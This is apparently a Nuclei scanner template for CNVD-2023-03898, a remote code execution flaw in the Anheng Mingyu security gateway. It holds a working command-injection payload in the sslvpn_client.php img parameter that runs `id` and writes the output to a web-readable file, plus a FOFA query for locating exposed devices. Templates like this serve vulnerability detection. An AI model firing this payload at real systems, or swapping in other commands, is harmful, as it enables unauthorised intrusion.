id: CNVD-2023-03898

info:
  name: Anheng Gateway - Remote Code Execution
  author: Co5mos
  severity: critical
  description: Anheng Gateway has a remote code execution vulnerability.
  metadata:
    max-request: 2
    verified: true
    fofa-query: title="明御安全网关"
  tags: 安恒信息-明御安全网关

http:
  - method: GET
    path:
      - "{{BaseURL}}/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp%7Cecho%20%60id%60%20%7Ctee%20/usr/local/webui/test"
      - "{{BaseURL}}/test"

    stop-at-first-match: true    
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'

      - type: status
        status:
          - 200